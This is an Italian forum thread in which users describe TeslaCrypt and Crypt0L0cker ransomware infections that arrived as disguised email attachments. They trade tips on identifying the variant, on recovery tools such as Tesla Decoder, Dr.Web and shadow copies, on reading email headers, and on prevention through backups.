Buona..notte a tutti (vista l'ora..)

Credo che mio padre sia stato fregato da questo maledetto.
Non riesco però a capire che variante è presente sul pc e quindi chiedo a voi come posso fare per individuarlo:

Il sistema operativo infetto è windows xp.
Tutta la cartella documenti è stata criptata: quasi tutti i file. dico quasi perchè i file bitmap non sono stati presi di mira. sono apribili. tutto il resto: gif,jpg,jpeg,doc,xls etc etc NO!

Non mi è comparso nessun avviso di riscatto. E ho controllato nelle varie cartelle (come suggerite nelle pagine precedenti) se erano presenti file che alludessero a qualche virus simile ma niente.

Tutti i file hanno mantenuto la loro estensione e ogni file credo abbia la sua grandezza. L'unica cosa che li accomuna sono tutti FILE VVV.

Mio padre sostiene di averlo preso tramite l'allegato di una mail.

Qualcuno riesce a darmi qualche info in più? Magari un tentativo di ripristino?

Grazie a tutti.

E fai bene. Indubbiamente l'arma migliore contro questo infame virus sono i backup dei dati, in virus in se e per se non è devastante per il sistema come i virus classici, ma lo è per i dati, Se tutti avessero dei backup dei dati, questo virus scomparirebbe in breve tempo, ma purtroppo non è così.

l'arma migliore sono
- separazione tra utenti e amministratori del pc
- divieto di esecuzione per gli utenti, tranne che nelle cartelle fidate (windows, programfiles, poco altro)

Se poi non funziona qualche sciocchezza si mette a posto ;-)

Ma hanno avviato il contenuto (con che estensione?) dello zip?
Lo hanno semplicemente estratto e si è avviato da solo anche senza doppio click sui file?
Perché avevo letto che ad alcuni è addirittura bastato anche solo salvare lo zip (alcuni parlavano di un cab) sull'hard disk!

E' un "finto" zip, in realtà è un img.zip.exe, ma se uno ha l'estensione nascosta, vede semplicemente img.zip, lo apre pensando che si apra winzip con la lista dei file contenuti, e invece si è già beccato il virus!
A volte è anche "mascherato" come xxx.pdf.exe.

E' un "finto" zip, in realtà è un img.zip.exe, ma se uno ha l'estensione nascosta, vede semplicemente img.zip, lo apre pensando che si apra winzip con la lista dei file contenuti, e invece si è già beccato il virus!
A volte è anche "mascherato" come xxx.pdf.exe.
Questo effettivamente potrebbe trarre in inganno l'utente alle prime armi.
Certo che però Microsoft ci mette il suo disabilitando di default la visualizzazione delle estensioni conosciute!
Ad ogni modo, l'opzione per la visualizzazione delle estensioni conosciute dovrebbe agire solo sull'esplora risorse, mentre sia i client email che la webmail dovrebbero mostrare sempre l'estensione degli allegati... probabilmente agisce solo sui client email Microsoft.

hanno aperto lo zip, anche perché ha l' icona dello zip quindi trae in inganno.
Purtroppo dei clienti del mio cliente allega documenti in formato zip
:doh:

Contattati quelli di decryptolocker.it e mi dicono che al momento non c'è alcuna soluzione per i file ccc.

Ieri mio cugino se l'è beccato. Ha criptato anche tutti i file sugli HD esterni. Quindi anche i backup.

Ho comunque mandato i file a dr.web per una verifica

P.S. antivirus usato in entrambi i casi: Avira PE

Qualche antivirus ha avuto successo nel bloccarlo prima dell'infezione?

Questo effettivamente potrebbe trarre in inganno l'utente alle prime armi.
Certo che però Microsoft ci mette il suo disabilitando di default la visualizzazione delle estensioni conosciute!Non sottovalutare la potenza di PlaySta...ehm, dell'utente.

Da noi c'è un'impiegata che riceve giornalmente mail con titolo "Today's bookings" da, ipotizzo, nome.cognome@azienda.com (e sono mail completamente legittime).
Qualche mese fa ha ricevuto una mail del tipo "Carta di credito ritirata" inviata da pagamenti@booking.com (ovviamente il vero mittente c'entrava con Booking come i cavoli a meranda) e l'ha aperta perché "eh è la solita mail del booking".

Fortunatamente prima di aprire il link contenuto nella mail (che io ricordi non aveva allegato, probabilmente era un link in cui chiedevano dati della carta e CVV) mi ha chiesto "scusa, ma... Non ti pare scritta in un italiano un po' strano? E di solito le mail del booking non sono neanche così tra l'altro"...

anche a me è capitato un pc infettato, però vi chiedo alcune cose per riassumere la situazione:

1) come stabilisco versione e variante del virus?

2) qual è il sito di dr web, qual è il prodotto da scaricare?

3) qual è la situazione attuale per il recuepro dei dati? Si può fare qualcosa ad eccezione del file .ccc?

4) il tool di kaspersky serve a qualcosa?

Mi servirebbe un riassunto della situazione perchè in 27 pagine, da gennaio sono cambiate un po' di cose e bisogna fare il punto su cosa funge e cosa no.

Vorrei che in ogni conquista dell'uomo ci fosse da qualche parte il MIO nome.
Vorrei essere stato quel giorno sulla luna.
Voglio provarci da solo.
Voglio ALTRE lune da conquistare.
E non permetterò a nessuno di farlo al posto mio,
perché ho energie e voglia di sognare...
si chiama... ricchezza mentale (https://www.youtube.com/watch?v=g1NZ1BucLT8). :fagiano:

Tornando ai giorni nostri... e al discorso del mittente della mail con dominio booking.com, visionando il codice sorgente della mail è possibile verificare il reale mittente?

anche a me è capitato un pc infettato, però vi chiedo alcune cose per riassumere la situazione:

1) come stabilisco versione e variante del virus?

2) qual è il sito di dr web, qual è il prodotto da scaricare?

3) qual è la situazione attuale per il recuepro dei dati? Si può fare qualcosa ad eccezione del file .ccc?

4) il tool di kaspersky serve a qualcosa?

Mi servirebbe un riassunto della situazione perchè in 27 pagine, da gennaio sono cambiate un po' di cose e bisogna fare il punto su cosa funge e cosa no.

1) non saprei, ma comunque ritengo tutte le versioni pericolose senza eccezioni.

2)-3) dr.web fornisce un antivirus a pagamento. per decriptare i files devi avere una licenza e poi loro ti forniscono un tool per la decriptazione (se possibile) C'è un link inviargli dei file per delle analisi. Per ora sono fermo a questo e aspetto che mi rispondano.

4) provato il tool kaspersky e non da nessun risultato

Il pc infetto ha il telsacrypt che cambia le estensioni in .vvv e per il quale, secondo bleepingcomputer.com, ad oggi non esiste ancora soluzione.

Bisogna sperare che drweb trovi la soluzione forse

Stamattina ho analizzato con teslacrypt sul Pc infetto completo (dove ha ha finito la cryptazione, W7) e non ho avuto risultati. key.dat non esiste, ho trovato un SA.dat dentro a Windows\TASK ma non va bene. E' sospetto perché ha un orario di inizio infezione ma la dimensione non è giusta, troppo piccola e dentro non vedo chiavi editandolo.

Poi ho provato con il secondo PC dove la cryptazione non è stata completata, ho guardato in modalità provvisoria in modo da non eseguire niente e lì purtroppo c'è XP.
l' eseguibile infetto è dentro appdata\local (o roaming??)in 7 e dati applicazioni in XP.
Sto installando in nuovi HD i O.S. e l' XP diventa 7. (PC fujitsu quindi licenziato, era stato fatto il downgrade a suo tempo).

i file sono con estensione .vvv

Ragazzi, ma questo virus che cripta tutto è possibile beccarlo anche su Android?

Inviato dal mio GT-I9505 utilizzando Tapatalk

Salve, ad un mio amico è capitato di aprire un allegato email di Equitalia ed è partito il crypt dei file ma è stato interrotto dopo un po... al riavvio sono entrato in modalità provvisori ed ho fatto giare combofix per eliminare il virus.
Adesso mi ritrovo i files con estensione .gwycoqe che non riesco ad aprire. Non ho visto messaggi di pagamento (forse perche ha bloccato prima che terminasse). Come faccio a sapere che variante è? L' unica cosa che ho è il log di combofix, ma leggendolo non specifica il tipo di virus. Posso cercare qualche files all' interno dell'hd per capirci qualcosa? Ho fatto girare anche photorec e recuva ma mi recupera solo i file cancellati non di recente.
Nessuno di voi è capitata questa estensione?

Grazie.

In questo periodo sembra stiano dilagando questi Cryptolocker!!! Ma mi domando se il recupero dei files con windows XP sia possibile tramite "ripristino configurazione di sistema" a data precedente il crash....shadow explorer su XP SP3 pare non funzioni.

Oppure utilizzare Recuva, come descritto poco sopra da provaprova, ma non è detto funzioni per files cancellati recentemente...
...si accettano comunque consigli per chi ha già tentato procedure di undelete.

Ultima speranza per i files con estensione ".ccc" è quella di affidarsi a Dr.web augurandoci che trovino soluzione. Mille grazie a chi è ricorso a Dr. web con files .ccc e ci dà notizie (speriamo positive) di eventuali soluzioni.

Altrimenti....ahimé...non ci resta che piangere o di "ibernare" l'hd per 2/3 anni e sperare che gli esperti trovino soluzione definitiva!!

Ripristino configurazione di sistema non va perchè sistema solo il registro e i drivers.
shadows explorer non funziona, XP non ha le copie shadows, VISTA E W7 si.

I software di recupero dati non fanno niente perchè i file sono modificati e rinominati, non vengono cancellati.

Criptare veramente un HD vorrebbe ore questo virus lo fa in poco tempo. ne abbiamo parlato più indietro.

..Ultima speranza per i files con estensione ".ccc" è quella di affidarsi a Dr.web augurandoci che trovino soluzione. Mille grazie a chi è ricorso a Dr. web con files .ccc e ci dà notizie (speriamo positive) di eventuali soluzioni.

Altrimenti....ahimé...non ci resta che piangere o di "ibernare" l'hd per 2/3 anni e sperare che gli esperti trovino soluzione definitiva!!

Stiamo a vedere Dr.web, anch'io devo sistemare un PC con "CCC" :mad: :muro: :muro:

Ripristino configurazione di sistema non va perchè sistema solo il registro e i drivers.
shadows explorer non funziona, XP non ha le copie shadows, VISTA E W7 si.

I software di recupero dati non fanno niente perchè i file sono modificati e rinominati, non vengono cancellati.

Criptare veramente un HD vorrebbe ore questo virus lo fa in poco tempo. ne abbiamo parlato più indietro.

I files che ho visto sono criptati e in brevissimo tempo, compresi hd esterni con backup, centinaia di migliaia di file.

Per quanto sembra assurdo è successo.

http://sensorstechforum.com/remove-teslacrypt-and-restore-vvv-encrypted-files/


si parla di network sniffer...

qualcuno ha mai provato ad usarne uno per cercare di intercettare la chiave di criptaggio?

Tornando ai giorni nostri... e al discorso del mittente della mail con dominio booking.com, visionando il codice sorgente della mail è possibile verificare il reale mittente?Andando a guardare gli header, dovresti poter risalire a tutto il giro che la mail ha fatto.
Potrei sbagliarmi, ma anche se è stato usato un open relay per mandarla, c'è registrato l'IP dal quale è stata consegnata all'open relay.

Sicuramente non è una cosa di cui l'utente comune si preoccupa, in ogni caso.

acquistare kasperski o equivalente antivirus di altro produttore, registrarsi al servizio supporto e mandare i file colpiti può risolvere qualcosa o può essere prevista una soluzione "comune" al criptaggio dei file?

qui dice che teslacrypt si può sistemare..

www.ilsoftware.it/articoli.asp?tag=Decodificare-i-file-cifrati-dal-ransomware-Tesla-Crypt_12160

scusate, ma come si fa a impedire gli exe su alcune cartelle??

ho proprio guardato questa procedura e provata martedì mattina.
nada. :mad: il file key.dat non c'è.

Devi avere un O.S. pro che ti permette di modificare i permessi di lettura ed esecusione.

Per ora l' unico che ha fermato qualcosa è il SEP (norton aziendale), nei clienti dove è installato ha impedito l' esecuzione dello ZIP.

Stamattina ho analizzato con teslacrypt sul Pc infetto completo (dove ha ha finito la cryptazione, W7) e non ho avuto risultati. key.dat non esiste, ho trovato un SA.dat dentro a Windows\TASK ma non va bene. E' sospetto perché ha un orario di inizio infezione ma la dimensione non è giusta, troppo piccola e dentro non vedo chiavi editandolo.

Poi ho provato con il secondo PC dove la cryptazione non è stata completata, ho guardato in modalità provvisoria in modo da non eseguire niente e lì purtroppo c'è XP.
l' eseguibile infetto è dentro appdata\local (o roaming??)in 7 e dati applicazioni in XP.
Sto installando in nuovi HD i O.S. e l' XP diventa 7. (PC fujitsu quindi licenziato, era stato fatto il downgrade a suo tempo).

i file sono con estensione .vvv

Ho lo stesso problema, con la medesima estensione sul pc di un amico.
Ci sono novità?

Ho letto di questa procedura, cosa ne pensate?

http://deletemalware.blogspot.it/2015/12/vvv-extension-howrecover-ransomware.html

M File Anti-Copy potresse essere un'efficace prevenzione?

Impedire la copia e l’eliminazione dei file del PC. M File Anti-Copy (http://www.aranzulla.it/impedire-copia-spostamento-ed-eliminazione-dei-file-5103.html)

Andando a guardare gli header, dovresti poter risalire a tutto il giro che la mail ha fatto.
Potrei sbagliarmi, ma anche se è stato usato un open relay per mandarla, c'è registrato l'IP dal quale è stata consegnata all'open relay.

Sicuramente non è una cosa di cui l'utente comune si preoccupa, in ogni caso.
E invece nel caso di mail sospette potrebbe essere utile preoccuparsene di decifrarlo l'header!

Ho visto in particolare che è sempre presente un campo "Return-Path" che a volte contiene un indirizzo differente dal campo "From", che è quello visualizzato dal client come mittente della mail. A volte contiene lunghi codici numeri o alfanumerici. Cos'è quindi questo "Return-Path" (indirizzo/percorso di ritorno)?

Ci sono poi diversi "Received: from *****" che dovrebbero essere relativi ai vari server o domini che si sono passati la mail prima di arrivare a destinazione. Ci sono praticamente degli indirizzi con dominio il provider delle mail del destinatario e del mittente.

Open relay sarebbe una specie di servizio a cui ci si affida per mandare in automatico le mail tipo newsletter?

Per ora l' unico che ha fermato qualcosa è il SEP (norton aziendale), nei clienti dove è installato ha impedito l' esecuzione dello ZIP.
Ma ZIP o ZIP.EXE?

Io non ho ancora risolto (anche se avrei un outlook positivo), ma visto che stiamo tutti riccamente nella merda voglio almeno passarvi le info che ho raccolto io in questi giorni passati a cercre di risolvere.


anche a me è capitato un pc infettato, però vi chiedo alcune cose per riassumere la situazione:

1) come stabilisco versione e variante del virus?

2) qual è il sito di dr web, qual è il prodotto da scaricare?

3) qual è la situazione attuale per il recuepro dei dati? Si può fare qualcosa ad eccezione del file .ccc?

4) il tool di kaspersky serve a qualcosa?

Mi servirebbe un riassunto della situazione perchè in 27 pagine, da gennaio sono cambiate un po' di cose e bisogna fare il punto su cosa funge e cosa no.

1) Per capire la variante devi anzitutto guardare se nel file .txt con le istruzioni per il riscatto dice qualcosa: spesso lo dice proprio lì. Ma poi se esistono delle sub-varianti, magari customizzate da questo o quel gruppo criminale che lancia l'infezione, non te lo so dire.

2) hai 2 opzioni: il distributore italiano di Dr web, che è raggiungibile al sito decryptolocker.it, dove troverai anche le semplici istruzioni da seguire per sottoporgli il caso, oppure vai di dr web, che però, fortunello io, ha appena cambiato le sue policy di assistenza (LEGGI QUI (https://news.drweb.com/show/?c=5&i=9713&lng=en)): ovvero non te la cavi più con 35€ comrpando la licenza. Bensì anche dai russi devi inviare i file richiesti ed aspettare che rispondano. Ma sono piuttosto lenti a farlo i russi. E di sicuro il prezzo si sarà alzato. oppure paghi i cybercriminali.

Questo è quanto per adesso.

Ps pare che dr web riesca via via a decriptare anche più varianti di quelle che pubblicizza apertamente, perciò voi mandate i file e vedete che vi dice, che già i russi son lenti di loro. Gli italiani sono invece molto veloci. Ma i prezzi si sono alzati molto, praticamente differiscono poco da quelli del riscatto. Ma si paga solo se sono riusciti a decrittare i file inviati (e si decide di procedere all'acquisto del pacchetto).


Il pc infetto ha il telsacrypt che cambia le estensioni in .vvv e per il quale, secondo bleepingcomputer.com, ad oggi non esiste ancora soluzione.

Bisogna sperare che drweb trovi la soluzione forse

Tu prova ad inviargli i file richiesti, hai visto mai....


Salve, ad un mio amico è capitato di aprire un allegato email di Equitalia ed è partito il crypt dei file ma è stato interrotto dopo un po... al riavvio sono entrato in modalità provvisori ed ho fatto giare combofix per eliminare il virus.
Adesso mi ritrovo i files con estensione .gwycoqe che non riesco ad aprire. Non ho visto messaggi di pagamento (forse perche ha bloccato prima che terminasse). Come faccio a sapere che variante è? L' unica cosa che ho è il log di combofix, ma leggendolo non specifica il tipo di virus. Posso cercare qualche files all' interno dell'hd per capirci qualcosa? Ho fatto girare anche photorec e recuva ma mi recupera solo i file cancellati non di recente.
Nessuno di voi è capitata questa estensione?

Grazie.
Per scoprire la variante, vedi cosa ho risposto poche righe su. E comunque, anche se non sono diventato un luminare della materia in questi pochi giorni, mi sa che la tua estensione indica una variante che cripta i files con estensioni variabili. Guarda comunque il file txt con le istruzioni.
Spesso le nuove varianti inibiscono anche il recupero tramite shadow copy oppure usando software di recupero dati, anche se qualcuno sostiene che è riuscito ad usarle, ma non ho seguito bene l'argomento.


In questo periodo sembra stiano dilagando questi Cryptolocker!!! Ma mi domando se il recupero dei files con windows XP sia possibile tramite "ripristino configurazione di sistema" a data precedente il crash....shadow explorer su XP SP3 pare non funzioni.

Oppure utilizzare Recuva, come descritto poco sopra da provaprova, ma non è detto funzioni per files cancellati recentemente...
...si accettano comunque consigli per chi ha già tentato procedure di undelete.

Ultima speranza per i files con estensione ".ccc" è quella di affidarsi a Dr.web augurandoci che trovino soluzione. Mille grazie a chi è ricorso a Dr. web con files .ccc e ci dà notizie (speriamo positive) di eventuali soluzioni.

Altrimenti....ahimé...non ci resta che piangere o di "ibernare" l'hd per 2/3 anni e sperare che gli esperti trovino soluzione definitiva!!

Per la precisione si tratta di Crypt0L0cker, (2 zeri al posto delle 2 o). per riconoscerlo lo si vede nel file con le istruzioni per il riscatto , e dal fatto che cambia le estensioni tutte in .encrypt.
Su questa variante Dr web ed i partner italiani pare abbiano dei tool che decriptano con successo i file.


Ripristino configurazione di sistema non va perchè sistema solo il registro e i drivers.
shadows explorer non funziona, XP non ha le copie shadows, VISTA E W7 si.

I software di recupero dati non fanno niente perchè i file sono modificati e rinominati, non vengono cancellati.

Criptare veramente un HD vorrebbe ore questo virus lo fa in poco tempo. ne abbiamo parlato più indietro.

Inizialmente qualcosa facevano, perchè pare che per criptare alla fine cancellavano il dato originale. Le ultime varianti invece no: anche eprchè se così non fosse stato, sul mio pc il virus avrebbe potuto fare poco, avendo su tutte le partizoni spazio prossimo allo zero. Altrimenti utilizzano una cifratura a blocchi (ne so poco). Io invece spero che proprio lo scarso spazio su disco non mi abbia causato perdite di dati con processi di criptazione non andati a buon fine (per cui anche il decrypt finirebbe col fallire) Sono molto preoccupato al riguardo.

Quello che a me non è chiaro è se il virus lo devo togliere o se finita la criptazione, come dicono alcuni, se ne va da sè. In particolare non ho ancora capito se il mio pc può infettare altri devices in rete. O se i cell android possono essere "portatori sani" dell'infezione. E, in caso contagiassi altri pc, la chiave di decriptazione sarebbe la stressa (nel qual caso significherebbe che è il mio cp a criptare i loro files), o ne verrebbe creata un'altra?

Altra cosa. se muovo o rinomino i files (non l'estensione .encrypted) poi la decriptatura non va più a buon fine?
O ancora: se uso una chiave riprodotta da Dr web, che però risultasse imperfetta, i file che non riesce a decodificare poi rimangono in una sorta di "limbo" e pertanto non più decriptabili anche quando dovessi entrare in possesso della giusta chiave? Nel qual caso conviene lavorare su una copia dei dati e vedere il risultato, visto che mi apre di aver capito che si può lavorare su una copia, e non serve nemmeno avviare il SO infettato (cosa che invece pare serva, per recuperare la chiave quando ci si rivolge ai criminali: lì se si usa l'antivirus si rischia di non venirne più a capo, da quanto ho letto). Potete confermare?

Peraltro con la chiave rifatta il rischio che qualche file non venga decriptato c'è, da quanto ho letto su bleeper....
Ciao ed in bocca al lupo.

([...] lì se si usa l'antivirus si rischia di non venirne più a capo, da quanto ho letto). Potete confermare?
L'avevo letta questa cosa, che se scoprono che stai cercando di rimuovere l'infezione (o magari anche solo a decriptare i file da te), buttano via la chiave. Magari non tutti fanno così, o sperando che un giorno tu ti rivolga a loro non lo fanno comunque.

Rileggendo...
Io ieri ho beccato (pare) questo malware, ed in effetti stavo guardando un film in streaming (ma non sul sito che dici tu, almeno mi pare). D'altro canto non ho cliccato (e mai l'ho fatto) su alcun allegato mail sospetto.
Si è aperto qualche popup o ha installato qualche plugin tipo flash player taroccato? Usi estensioni come NoScript, Adblock Plus, uBlock, ecc.?
Su che browser, sistema operativo, aggiornamenti Windows Update, ecc.?
Inoltre, non sono informato se questi siti siano legali o meno. Nel caso lo fossero, ti ricordi di quale sito si potrebbe trattare (in modo da starne alla larga)?

Se l'hai preso dal browser, mi chiedo se sia il caso avviare il browser in una sandbox tipo Sandboxie così tutti i file scaricati rimangono confinati in una cartella fino ad un eventuale recupero manuale e un eventuale programma avviato dal browser non può scrivere direttamente sui dischi.

L'avevo letta questa cosa, che se scoprono che stai cercando di rimuovere l'infezione (o magari anche solo a decriptare i file da te), buttano via la chiave. Magari non tutti fanno così, o sperando che un giorno tu ti rivolga a loro non lo fanno comunque.


Non conosco bene la situazione, ma da quanto ho capito la questione dovrebbe essere un'altra, ovvero che se rimuovi il virus di fatto interrompi la comunicazione coi loro server per prendere la chiave, magari semplicemente perchè cancelli i file di sitruzioni. Oppure un altro motivo, ma sempre di natura tecnica, pertanto non credo sia una ritorsione dei criminali.



Rileggendo...

Si è aperto qualche popup o ha installato qualche plugin tipo flash player taroccato? Usi estensioni come NoScript, Adblock Plus, uBlock, ecc.?
Su che browser, sistema operativo, aggiornamenti Windows Update, ecc.?
Inoltre, non sono informato se questi siti siano legali o meno. Nel caso lo fossero, ti ricordi di quale sito si potrebbe trattare (in modo da starne alla larga)?

Se l'hai preso dal browser, mi chiedo se sia il caso avviare il browser in una sandbox tipo Sandboxie così tutti i file scaricati rimangono confinati in una cartella fino ad un eventuale recupero manuale e un eventuale programma avviato dal browser non può scrivere direttamente sui dischi.

Non ricordo popup, D'altronde uso adblock plus e no script. Ma ovviamente quando vado su un sito di streaming qualche script lo devo abilitare, sennò non parte nulla (idem per il grosso dei siti: spesso devi attivare gli script), ed a volte è necessario anche disabilitare adblock. probabilmente mi ha fregato che aggiorno lentamente il adobe flash. L'avrò beccato per quello.
Sui siti: non usandoli mai non ricordo quali fossero. Li avevo aperti tanto per rivedere una trasmissione di cui mi ero perso una puntata 8e che non viene caricata sul sito web della rete). Peraltro non so se il problema era sul sito per i film, o sul sito di host del filmato. E non saprei essere preciso, perchè visto che mi stavo togliendo lo sfizio di vedere un po' che siti del tipo c'erano, ne ho aperto più di uno, ed ogniuno di essi riportava la stessa puntata hostata su più siti di host (tipo nitro etc). Pertanto anche per capire se c'era un filmato a più alta risoluzione, ne ho aperti 5-6 assieme.
comunque fra i siti c'era cb (che avevo sentito), ed un altro dal nome italianissimo che non ricordo (con la parola film nel tittolo però).
Secondo me era un sito "tranquillo" ma compromesso (nel plugin flash). Poi non so....

Io non ho ancora risolto (anche se avrei un outlook positivo), ma visto che stiamo tutti riccamente nella merda voglio almeno passarvi le info che ho raccolto io in questi giorni passati a cercre di risolvere.
1) Per capire la variante devi anzitutto guardare se nel file .txt con le istruzioni per il riscatto dice qualcosa: spesso lo dice proprio lì. Ma poi se esistono delle sub-varianti, magari customizzate da questo o quel gruppo criminale che lancia l'infezione, non te lo so dire.
Ma questo file .txt dove si può trovare?
2) hai 2 opzioni: il distributore italiano di Dr web, che è raggiungibile al sito decryptolocker.it, dove troverai anche le semplici istruzioni da seguire per sottoporgli il caso, oppure vai di dr web, che però, fortunello io, ha appena cambiato le sue policy di assistenza (LEGGI QUI (https://news.drweb.com/show/?c=5&i=9713&lng=en)): ovvero non te la cavi più con 35€ comrpando la licenza. Bensì anche dai russi devi inviare i file richiesti ed aspettare che rispondano. Ma sono piuttosto lenti a farlo i russi. E di sicuro il prezzo si sarà alzato. oppure paghi i cybercriminali.
Ho appena visitato la pagina di Dr.web russo e sembra che devi aver acquistato il loro antivirus prima dell'infezione (...the license must have been purchased before, not after the infection...). Sembra anche che sia sconsigliato rimuovere il virus...ma quando si viene contagiati è proprio la prima cosa che uno fa!!!
Ps pare che dr web riesca via via a decriptare anche più varianti di quelle che pubblicizza apertamente, perciò voi mandate i file e vedete che vi dice, che già i russi son lenti di loro. Gli italiani sono invece molto veloci. Ma i prezzi si sono alzati molto, praticamente differiscono poco da quelli del riscatto. Ma si paga solo se sono riusciti a decrittare i file inviati (e si decide di procedere all'acquisto del pacchetto).
Se i prezzi crescono significa che aumenta la richiesta e quindi le infezioni!!! Regola n. 1: backup il più spesso possibile!!!!
Tu prova ad inviargli i file richiesti, hai visto mai...
Sperando che non valga quanto su riportato riguardo l'obbligo di acquisto preventivo dell'antivirus..
Per scoprire la variante, vedi cosa ho risposto poche righe su. E comunque, anche se non sono diventato un luminare della materia in questi pochi giorni, mi sa che la tua estensione indica una variante che cripta i files con estensioni variabili. Guarda comunque il file txt con le istruzioni.
Spesso le nuove varianti inibiscono anche il recupero tramite shadow copy oppure usando software di recupero dati, anche se qualcuno sostiene che è riuscito ad usarle, ma non ho seguito bene l'argomento.
Il recupero funziona solo se hai win 7 o sup. o anche con Shadow Explorer e, purtroppo, non con XP SP3.
Ho eseguito anche l'applicazione Tesla Decoder (v. 0.0.64) e, lanciandola e leggendo il file readme.txt, ho visto che la versione è aggiornata anche con i files criptati con le ultime estensioni ".ccc" e ".vvv" ma bisogna avere il file "key.dat" che sembra introvabile. Però sembrerebbe che se possiedi la chiave, le possibilità di decriptaggio siano buone.
Inizialmente qualcosa facevano, perché pare che per criptare alla fine cancellavano il dato originale. Le ultime varianti invece no: anche eprchè se così non fosse stato, sul mio pc il virus avrebbe potuto fare poco, avendo su tutte le partizoni spazio prossimo allo zero. Altrimenti utilizzano una cifratura a blocchi (ne so poco). Io invece spero che proprio lo scarso spazio su disco non mi abbia causato perdite di dati con processi di criptazione non andati a buon fine (per cui anche il decrypt finirebbe col fallire) Sono molto preoccupato al riguardo.
Confermo. Ieri ho tentato inutilmente il recupero dei files mediante Recuva ma le nuove versioni del Cryptolocker cancellano definitivamente i files originali.
Altra cosa. se muovo o rinomino i files (non l'estensione .encrypted) poi la decriptatura non va più a buon fine?
O ancora: se uso una chiave riprodotta da Dr web, che però risultasse imperfetta, i file che non riesce a decodificare poi rimangono in una sorta di "limbo" e pertanto non più decriptabili anche quando dovessi entrare in possesso della giusta chiave? Nel qual caso conviene lavorare su una copia dei dati e vedere il risultato, visto che mi apre di aver capito che si può lavorare su una copia, e non serve nemmeno avviare il SO infettato (cosa che invece pare serva, per recuperare la chiave quando ci si rivolge ai criminali: lì se si usa l'antivirus si rischia di non venirne più a capo, da quanto ho letto). Potete confermare?
Sempre Tesla Decoder raccomanda di eseguire un backup completo dei dati criptati prima di eseguire una qualsiasi operazione!!!

Un collega in ufficio ha preso questo "cryptolocker", fortunatamente gli altri pc erano spenti perchè si lavora in cloud...

La situazione è di quella già lette, aperto un allegato email, le estensioni vengono cambiate in .vvv e tenta di disabilitare la copia shadow.
Da MSE mi rileva i file "del riscatto" come Ransom:HTML/Tescrypt.D, già provato i tool Coin Vault Decryptor, Tesla Decrypter e forse pure altro, senza successo.

A me almeno per ora interesserebbe pulire il pc, è possibile o bisogna andare di format? Perchè mi sembra che i file di riscatto vengano ricreati ad ogni avvio e il pc sembra abbastanza lento.
I file li ho parzialmente recuperati grazie alle versione precedenti (non le foto su D: però..), ormai non ci credo molto nel recuperare il resto.

Ma questo file .txt dove si può trovare?

In tutte le cartelle dove ha criptato un file! :D Guarda, è la cosa più semplice di tutta la faccenda. E' il file con le istruzioni. Per prudenza evita l'omologo con estensione html (dove se clicchi sull'iperlink ti conduce al portale dove trovi ammontare del riscatto e tempo residuo.


Ho appena visitato la pagina di Dr.web russo e sembra che devi aver acquistato il loro antivirus prima dell'infezione (...the license must have been purchased before, not after the infection...). Sembra anche che sia sconsigliato rimuovere il virus...ma quando si viene contagiati è proprio la prima cosa che uno fa!!!


Leggi i miei post precedenti e trovi tutte le info in merito. hanno appena cambiato policy. Se lo compri prima dell'infezione ti offrono il servizio gratis (mi pare), altrimenti adesso per avere supporto devi aprire un ticket sul loro sito, inviandgli i dati richiesti e loro li analizzano e ti dicono come procedere, se si può far qualcosa.



Se i prezzi crescono significa che aumenta la richiesta e quindi le infezioni!!! Regola n. 1: backup il più spesso possibile!!!!

Su questo avrò qualcosa da dire quando avrò concluso questo calvario.



Sperando che non valga quanto su riportato riguardo l'obbligo di acquisto preventivo dell'antivirus..

Vedi sopra.



Il recupero funziona solo se hai win 7 o sup. o anche con Shadow Explorer e, purtroppo, non con XP SP3.

Si ma non ti credere che se hai un SO che supporta le shadow copy allora sei sicuro al 100%, perchè motle varianti le rendono inutilizzabili. Peraltro io ancora non ho capito che cacchio sono ste shadow copy. Un po' come usare i programmi di recupero dati, sono una un pannicello caldo, non la vera soluzione. Se non ahi altre strade da tentare, allora cerchi di recuperare quel che puoi con questi strumenti surrettizi.



Ho eseguito anche l'applicazione Tesla Decoder (v. 0.0.64) e, lanciandola e leggendo il file readme.txt, ho visto che la versione è aggiornata anche con i files criptati con le ultime estensioni ".ccc" e ".vvv" ma bisogna avere il file "key.dat" che sembra introvabile. Però sembrerebbe che se possiedi la chiave, le possibilità di decriptaggio siano buone.

mò non me ne intendo assolutamente, ma se il key.dat è la chiave mancante, direi che è ovvio che non la hai. qualcuno diceva che se becchi il virus prima che abbia finito puoi prendere la chiave e risolvere. Ma francamente non ne capisco molto di crittografia.




Sempre Tesla Decoder raccomanda di eseguire un backup completo dei dati criptati prima di eseguire una qualsiasi operazione!!!

io infatti opererò prima su dati copiati. Per questo cheidevo a lungo.

In tutte le cartelle dove ha criptato un file! :D Guarda, è la cosa più semplice di tutta la faccenda. E' il file con le istruzioni. Per prudenza evita l'omologo con estensione html (dove se clicchi sull'iperlink ti conduce al portale dove trovi ammontare del riscatto e tempo residuo.

trovato!! ma non risolvo...:mc:

Leggi i miei post precedenti e trovi tutte le info in merito. hanno appena cambiato policy. Se lo compri prima dell'infezione ti offrono il servizio gratis (mi pare), altrimenti adesso per avere supporto devi aprire un ticket sul loro sito, inviandgli i dati richiesti e loro li analizzano e ti dicono come procedere, se si può far qualcosa.

Grazie delle info. Proverò a contattarli inviandogli i files.

Si ma non ti credere che se hai un SO che supporta le shadow copy allora sei sicuro al 100%, perchè motle varianti le rendono inutilizzabili. Peraltro io ancora non ho capito che cacchio sono ste shadow copy. Un po' come usare i programmi di recupero dati, sono una un pannicello caldo, non la vera soluzione. Se non ahi altre strade da tentare, allora cerchi di recuperare quel che puoi con questi strumenti surrettizi.

Anche io nutro i miei dubbi su Shadow anche se il problema ce l'ho su XP SP3....ma quando sei disperato le tenti tutte e non trascuri nessuna possibilità ......

mò non me ne intendo assolutamente, ma se il key.dat è la chiave mancante, direi che è ovvio che non la hai. qualcuno diceva che se becchi il virus prima che abbia finito puoi prendere la chiave e risolvere. Ma francamente non ne capisco molto di crittografia.

Nemmeno io purtroppo....ho trovato questo link (http://www.bleepingcomputer.com/virus-removal/teslacrypt-alphacrypt-ransomware-information) dove spiega le possibilità di decriptaggio delle varie versioni di Tesla Decoder e conferma quanto hai detto che è indispensabile intercettare il file key.dat al momento della criptazione..

io infatti opererò prima su dati copiati. Per questo cheidevo a lungo.
Quello che ho fatto anche io. Ho già scritto sopra che tra qualche tempo si potranno recuperare i dati quindi le varie prove è meglio farle avendo una copia di..."backup"...

Speriamo bene... comunque ho deciso di sporgere denuncia..a tutti gli effetti si tratta di estorsione. Non si sa mai se li beccano... quanto meno sarà fatta giustizia!!

Ma questo file .txt dove si può trovare?

